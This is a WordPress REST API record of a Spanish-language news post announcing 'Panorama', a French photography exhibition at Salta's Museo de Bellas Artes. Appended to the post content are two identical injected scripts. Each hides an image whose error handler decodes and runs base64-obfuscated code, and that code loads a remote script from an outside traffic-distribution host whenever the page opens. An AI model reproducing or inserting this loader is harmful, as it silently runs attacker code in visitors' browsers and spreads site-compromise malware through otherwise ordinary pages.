{"id":1226,"date":"2022-08-03T10:27:28","date_gmt":"2022-08-03T13:27:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1226"},"modified":"2025-08-14T00:39:33","modified_gmt":"2025-08-14T03:39:33","slug":"panorama-dialogo-del-patrimonio-fotografico-y-la-imagen-contemporanea-en-el-museo-de-bellas-artes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1226","title":{"rendered":"\u00abPanorama\u00bb, di\u00e1logo del patrimonio fotogr\u00e1fico y la imagen contempor\u00e1nea en el Museo de Bellas Artes."},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#30025c\">Desde este jueves podr\u00e1s visitar la muestra que comprende la primera imagen patentada hasta la actualidad a trav\u00e9s de la mirada de setenta fot\u00f3grafos y fot\u00f3grafas francesas en Av. Belgrano 992.<\/h4>\n\n\n\n<p>Ma\u00f1ana jueves 4 de agosto a horas 20 con entrada libre y gratuita, se inaugura en el Museo de Bellas Artes (Av. Gral. Belgrano 992) \u201cPANORAMA\u201d, una exposici\u00f3n concebida originalmente por el Institut fran\u00e7ais de Par\u00eds en colaboraci\u00f3n con el historiador y el curador R\u00e9mi Parcollet.<\/p>\n\n\n\n<p>Esta exposici\u00f3n tiene vocaci\u00f3n de itinerancia internacional. Ya se present\u00f3 en el Palais de Tokyo en Par\u00eds y en el Museo provincial de Arte Contempor\u00e1neo en Mar del Plata, entre otros, con la colaboraci\u00f3n de la Embajada de Francia y del Institut fran\u00e7ais d&#8217;Argentine.<\/p>\n\n\n\n<p>Ochenta y tres obras de setenta fot\u00f3grafos componen una exposici\u00f3n itinerante que plantea una mirada retrospectiva sobre el patrimonio y la creaci\u00f3n fotogr\u00e1fica en Francia.<br><br>Su objeto es tanto mostrar las evoluciones de la pr\u00e1ctica fotogr\u00e1fica, como poner de relieve a ochenta fot\u00f3grafos destacados que trabajaron en suelo franc\u00e9s.<\/p>\n\n\n\n<p>Gracias a una observaci\u00f3n sint\u00e9tica, cronol\u00f3gica y tem\u00e1tica constituida por diferentes niveles de lectura, la muestra responde a las expectativas de un p\u00fablico amplio y diversificado. Asimismo, las especificaciones propias de este proyecto son una rara ocasi\u00f3n para congregar bajo un mismo techo a incunables y obras maestras de la fotograf\u00eda.<br><br>Este conjunto, reunido de manera razonada, renueva de forma did\u00e1ctica la reflexi\u00f3n sobre el soporte en cuesti\u00f3n bajo la forma de un paseo contemplativo. El desaf\u00edo es proponer una experiencia cultural enriquecedora, pero tambi\u00e9n viva y din\u00e1mica.<\/p>\n\n\n\n<p>La muestra puede ser visitada de martes de domingo de 10 a 20 horas en el Museo de Bellas Artes Av. Gral. M. Belgrano 992 de esta ciudad con entrada libre y gratuita.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/panorama-dialogo-del-patrimonio-fotografico-y-la-imagen-contemporanea-en-el-museo-de-bellas-artes-83983\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde este jueves podr\u00e1s visitar la muestra que comprende la primera imagen patentada hasta la actualidad a trav\u00e9s de la mirada de setenta fot\u00f3grafos y fot\u00f3grafas francesas en Av. Belgrano 992. Ma\u00f1ana jueves 4 de agosto a horas 20 con entrada libre y gratuita, se inaugura en el Museo de Bellas Artes (Av. Gral. Belgrano [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1227,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-1226","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1226"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1226"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1226\/revisions"}],"predecessor-version":[{"id":7409,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1226\/revisions\/7409"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1227"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1226"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1226"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1226"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}